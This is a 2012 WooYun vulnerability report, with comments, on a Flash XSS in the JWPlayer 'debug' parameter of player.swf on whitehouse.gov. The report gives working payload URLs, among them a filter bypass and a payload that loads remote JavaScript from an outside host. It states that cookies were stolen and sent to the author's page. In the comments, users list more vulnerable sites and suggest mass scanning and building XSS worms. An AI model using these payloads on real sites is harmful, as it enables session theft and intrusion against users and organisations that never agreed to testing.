当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-07165

漏洞标题:美国白宫主站XSS,求跨Obama

相关厂商:美国白宫

漏洞作者: gainover

提交时间:2012-05-15 23:07

修复时间:2012-05-15 23:07

公开时间:2012-05-15 23:07

漏洞类型:xss跨站脚本攻击

危害等级:高

自评Rank:12

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2012-05-15: 积极联系厂商并且等待厂商认领中,细节不对外公开
2012-05-15: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

这个这个,没上下文,白宫人不多吧,我跨谁呢,跨谁呢!!

详细说明:

I hope my Chinese-Wind-English can be understood.
First, The Website of the WhiteHouse use a JWPlayer (a video player based on flash from longtailvideo, www.longtailvideo.com), and this player have a xss vulnerability.
Next, we could use this vulnerability to construct an evil link to attack potential victims. The codes are listed below!
The evil code can be run in both IE and Firefox, but crashed in Chrome (:( unkown reason).
The attack flow:
1. Simple Alert, However, we got a "Access Denied Error". The server seems to have some strange filter rules? Luckily, We can bypass this limitation.
Failed Code

http://www.whitehouse.gov/files/flash/player.swf?debug=function(){alert(1)}


Success Code

http://www.whitehouse.gov/files/flash/player.swf?debug=function(){var a=alert;a(1)}


2. We found some other sensetive words are also banned, such as <script></script>.
3. The code used above is runable but harmless. A more harmful code :

http://www.whitehouse.gov/files/flash/player.swf?debug=(function(){var s='scr'.concat('ipt');location.replace('javascript:"<b src=//appmaker.sinaapp.com/a.js></b>"'.replace(/b/g,s))})


4. Run it then known it. (in Chinese: 试试看你就知道了!)

漏洞证明:

1. Simple alert example


2. Cookies got from whitehouse and sent to our own page.


3. Firefox can also run evil codes.

修复方案:

Delete unused JWPlayer or wait for JWPlayer update.

版权声明:转载请注明来源 gainover@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:3 (WooYun评价)

漏洞评价:

评论

  1. 2012-05-15 23:08 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    nice english,guy!

  2. 2012-05-15 23:15 | gainover 认证白帽子 ( 核心白帽子 | Rank:1710 漏洞数:93 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

    @xsser 这么快

  3. 2012-05-15 23:21 | shine 认证白帽子 ( 普通白帽子 | Rank:831 漏洞数:77 | coder)

    漏洞玩得尽兴啊!

  4. 2012-05-15 23:26 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    可以去社个44 :0

  5. 2012-05-15 23:28 | gainover 认证白帽子 ( 核心白帽子 | Rank:1710 漏洞数:93 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

    @xsser 这个得请凤姐出马了。。 俺们没绿卡~~

  6. 2012-05-15 23:31 | imlonghao ( 普通白帽子 | Rank:730 漏洞数:74 )

    玩的开心!小心FBI和CIA。哈哈

  7. 2012-05-15 23:33 | itianda ( 路人 | Rank:28 漏洞数:4 | 冰冷的天雾湿了谁的眼你不在我身边思...)

    继续膜拜G博士..

  8. 2012-05-15 23:34 | imlonghao ( 普通白帽子 | Rank:730 漏洞数:74 )

    SWF的跨域会火。。期待新作啊!!

  9. 2012-05-15 23:45 | zeracker 认证白帽子 ( 核心白帽子 | Rank:1068 漏洞数:137 | 多乌云、多机会!微信公众号: id:a301zls ...)

    大哥你玩的真有爱啊。上个月貌似,泉哥发过白宫的xss吧。

  10. 2012-05-15 23:49 | 蟋蟀哥哥 ( 普通白帽子 | Rank:363 漏洞数:57 | 巴蜀人士,80后宅男,自学成才,天朝教育失败...)

    Chinese-Wind-English。。chinese style吧。。。google翻译的?

  11. 2012-05-15 23:50 | 蟋蟀哥哥 ( 普通白帽子 | Rank:363 漏洞数:57 | 巴蜀人士,80后宅男,自学成才,天朝教育失败...)

    whitehouse使用的是drupal,大家可以扫下drupal用了该插件的网站。然后跨站。drupal有人用做sns,大家可以找几个sns练练xss蠕虫

  12. 2012-05-15 23:52 | gainover 认证白帽子 ( 核心白帽子 | Rank:1710 漏洞数:93 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

    @蟋蟀哥哥 = = GOOGLE能这么智能的加破折号么..

  13. 2012-05-15 23:53 | 蟋蟀哥哥 ( 普通白帽子 | Rank:363 漏洞数:57 | 巴蜀人士,80后宅男,自学成才,天朝教育失败...)

    @gainover -。- 那你的english太棒了,有最炫民族风的感觉.

  14. 2012-05-15 23:54 | tnt1200 ( 普通白帽子 | Rank:121 漏洞数:17 | 关注飞机安全....)

    @蟋蟀哥哥 是中国风英语吧

  15. 2012-05-15 23:54 | gainover 认证白帽子 ( 核心白帽子 | Rank:1710 漏洞数:93 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

    @蟋蟀哥哥 俺自己能看懂,俺就满足了

  16. 2012-05-15 23:57 | 蟋蟀哥哥 ( 普通白帽子 | Rank:363 漏洞数:57 | 巴蜀人士,80后宅男,自学成才,天朝教育失败...)

    @gainover 呵呵。。这个漏洞挺给力的。不管有多炫了

  17. 2012-05-16 00:05 | 蟋蟀哥哥 ( 普通白帽子 | Rank:363 漏洞数:57 | 巴蜀人士,80后宅男,自学成才,天朝教育失败...)

    @gainover 刚刚查看了下,发现joomla也有这玩意

  18. 2012-05-16 00:08 | 梦想肥羊 ( 实习白帽子 | Rank:89 漏洞数:18 | 博客:dnswalk.blog.163.com)

    惊动党中央。

  19. 2012-05-16 00:10 | gainover 认证白帽子 ( 核心白帽子 | Rank:1710 漏洞数:93 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

    @蟋蟀哥哥 额。用这个程序的网站还是挺多的。 不过就是看版本,这个播放器早些时期的版本好像没这个漏洞,大概在4.5,4.6以后才有。

  20. 2012-05-16 00:13 | 蟋蟀哥哥 ( 普通白帽子 | Rank:363 漏洞数:57 | 巴蜀人士,80后宅男,自学成才,天朝教育失败...)

    @gainover 嗯。好像和他的debug模式有关系。4.5,4.6是默认开启的?

  21. 2012-05-16 00:15 | gainover 认证白帽子 ( 核心白帽子 | Rank:1710 漏洞数:93 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

    他代码里debug的开启不开启,就是与你传入不传入debug这个参数有关,之前的版本,好像没加debug的功能吧,我也没去仔细看源码。 国外视频站貌似挺多用这个东西的, http://www.videospace.us/ 首页播放器就是了~·

  22. 2012-05-16 00:20 | 蟋蟀哥哥 ( 普通白帽子 | Rank:363 漏洞数:57 | 巴蜀人士,80后宅男,自学成才,天朝教育失败...)

    @gainover 查看了下,国外是用得多。但是版本符合的较少。

  23. 2012-05-16 00:22 | 蟋蟀哥哥 ( 普通白帽子 | Rank:363 漏洞数:57 | 巴蜀人士,80后宅男,自学成才,天朝教育失败...)

    @gainover 目前发现了这个:http://portaldemo2.securitycoverage.com/index.php/js/player/player.swf

  24. 2012-05-16 00:24 | gainover 认证白帽子 ( 核心白帽子 | Rank:1710 漏洞数:93 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

    @蟋蟀哥哥 = = 我找了个www.intel.com下的。。 俺都集中发这里了。。 WooYun: JWPlayer Xss 0day [Flash编程安全问题]

  25. 2012-05-16 00:28 | 蟋蟀哥哥 ( 普通白帽子 | Rank:363 漏洞数:57 | 巴蜀人士,80后宅男,自学成才,天朝教育失败...)

    @gainover 这个漏洞的研究价值以及爆路径的价值,大于xss的价值。

  26. 2012-05-16 00:32 | gainover 认证白帽子 ( 核心白帽子 | Rank:1710 漏洞数:93 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

    @蟋蟀哥哥 = = 还能爆路径啊? 刚又找到一个百度的。

  27. 2012-05-16 00:40 | 蟋蟀哥哥 ( 普通白帽子 | Rank:363 漏洞数:57 | 巴蜀人士,80后宅男,自学成才,天朝教育失败...)

    @gainover 是的,可以爆服务器路径.既然可以爆路径,应该有办法一句话了。。

  28. 2012-05-16 00:43 | gainover 认证白帽子 ( 核心白帽子 | Rank:1710 漏洞数:93 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

    @蟋蟀哥哥 = = 对渗透那套知知甚少。

  29. 2012-05-16 00:45 | xsjswt ( 普通白帽子 | Rank:156 漏洞数:49 | 我思故我猥琐,我猥琐故我强大)

    you got better English than I do. Zhi neng mobai a Big Ox

  30. 2012-05-16 00:45 | 蟋蟀哥哥 ( 普通白帽子 | Rank:363 漏洞数:57 | 巴蜀人士,80后宅男,自学成才,天朝教育失败...)

    @gainover 我对flash不了解啊。。。你看看有没有办法运行php命令的

  31. 2012-05-16 00:50 | gainover 认证白帽子 ( 核心白帽子 | Rank:1710 漏洞数:93 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

    @蟋蟀哥哥 = = 怎么运行PHP? 你意思是用XSS自动传SHELL的那种?

  32. 2012-05-16 00:54 | 蟋蟀哥哥 ( 普通白帽子 | Rank:363 漏洞数:57 | 巴蜀人士,80后宅男,自学成才,天朝教育失败...)

    @gainover 我是说参数里面加入php代码,让页面运行.

  33. 2012-05-16 00:55 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    @蟋蟀哥哥 一个是客户端一个服务端的 你丢人了

  34. 2012-05-16 00:58 | gainover 认证白帽子 ( 核心白帽子 | Rank:1710 漏洞数:93 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

    @gainover 这个。。这个。。 貌似不行吧!

  35. 2012-05-16 00:59 | 蟋蟀哥哥 ( 普通白帽子 | Rank:363 漏洞数:57 | 巴蜀人士,80后宅男,自学成才,天朝教育失败...)

    @xsser 我开始说了这个bug可以爆路径的。服务端可以运行。

  36. 2012-05-16 01:00 | 蟋蟀哥哥 ( 普通白帽子 | Rank:363 漏洞数:57 | 巴蜀人士,80后宅男,自学成才,天朝教育失败...)

    @gainover 发送邮件到:shuai.zend#qq.com 我给你演示爆路径

  37. 2012-05-16 01:08 | gainover 认证白帽子 ( 核心白帽子 | Rank:1710 漏洞数:93 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

    @蟋蟀哥哥 已发送

  38. 2012-05-16 01:09 | zeracker 认证白帽子 ( 核心白帽子 | Rank:1068 漏洞数:137 | 多乌云、多机会!微信公众号: id:a301zls ...)

    这么晚还在乌云激情。

  39. 2012-05-16 01:22 | gainover 认证白帽子 ( 核心白帽子 | Rank:1710 漏洞数:93 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

    @zeracker 必须的,您老不也在。 哈哈

  40. 2012-05-16 01:27 | zeracker 认证白帽子 ( 核心白帽子 | Rank:1068 漏洞数:137 | 多乌云、多机会!微信公众号: id:a301zls ...)

    @gainover 我都是每天三无点睡觉,中午起床的哈。

  41. 2012-05-16 01:37 | gainover 认证白帽子 ( 核心白帽子 | Rank:1710 漏洞数:93 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

    @zeracker = = 牛 。都是黑夜里闪烁着光芒的那一颗

  42. 2012-05-16 02:16 | testcvc ( 路人 | Rank:5 漏洞数:1 | test)

    膜拜楼上各位半夜发光的大牛

  43. 2012-05-16 02:16 | zeracker 认证白帽子 ( 核心白帽子 | Rank:1068 漏洞数:137 | 多乌云、多机会!微信公众号: id:a301zls ...)

    @gainover 。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。

  44. 2012-05-18 14:20 | PPFish ( 路人 | Rank:10 漏洞数:1 | 一株是枣树,另一株还是枣树。)

    =。= Nice Chinese-Wind-English